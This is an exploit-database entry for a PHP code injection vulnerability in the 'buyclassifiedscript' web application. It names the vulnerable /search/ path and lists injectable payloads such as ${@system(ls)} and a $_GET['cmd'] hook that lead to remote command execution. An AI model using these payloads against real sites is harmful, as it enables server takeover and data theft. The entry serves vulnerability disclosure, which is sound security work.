buyclassifiedscript PHP code injection vulnerability

vendor:

Unknown

by:

d3b4g

N/A

CVSS

N/A

PHP code injection

Unknown

CWE

Product Name: Unknown

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: Unknown

Related CWE: Unknown

CPE: Unknown

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7

2011

buyclassifiedscript PHP code injection vulnerability

This vulnerability allows an attacker to inject custom code into the server side scripting engine.It's possible to get a remote cmd by taking advantage of this vulnerability. Vulnerable function: /search/ () php code excution: http://localhost/path/search {Inject malicious code} () example of code you can inject: // ${@system(ls)} ${@print(hello)} $_GET['cmd'] //

Mitigation:

Unknown

Source

Exploit-DB raw data:

# Exploit Title: buyclassifiedscript PHP code injection vulnerability
# Date: 25.11.201
# Exploit Author: d3b4g
# Vendor Homepage: http://buyclassifiedscript.com/
# Tested on:Windows 7
# Blog: d3b4g.me
  
  
   
    
----------------------------------------------------------------------------------

     This vulnerability  allows an attacker to inject custom code
     into the server side scripting engine.It's possible to get a remote cmd by taking
     advantage of this vulnerability.
     
 
     Vulnerable function: 

     /search/ 


     () php code excution :
  
  
     http://localhost/path/search {Inject malicious code}


     () example of code you can inject:


     //  ${@system(ls)}

        ${@print(hello)}

        $_GET['cmd']


                         //  
      
  
  
-end-